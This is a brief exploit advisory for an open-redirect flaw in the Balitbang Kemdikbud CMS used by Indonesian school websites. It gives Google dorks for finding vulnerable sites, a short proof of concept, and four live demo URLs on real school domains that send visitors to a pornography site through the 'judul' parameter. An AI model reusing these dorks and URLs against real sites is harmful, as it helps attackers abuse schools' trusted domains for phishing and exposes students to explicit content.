[+]Exploit Title: Balitbang Open Redirect Indonesian School Site
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork:
- inurl:html/index.php
- Tim Balitbang Kemdikbud versi 3.5.3 Tim Balitbang Kemdikbud
- site:sch.id Balitbang
etc.
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Find website with the dork
Find the path with "redirect" parameter
You can add website you want to go on the vuln parameter
Demo sites:
http://smpmuh2yk.sch.id/html/index.php?id=kunjungblog&judul=xnxx.com
http://www.smkgarnus.sch.id/html/index.php?id=kunjungblog&judul=xnxx.com
http://sman5pekanbaru.sch.id/html/index.php?id=kunjungblog&judul=xnxx.com
http://stielm-suryalaya.ac.id/html/index.php?id=kunjungblog&judul=xnxx.com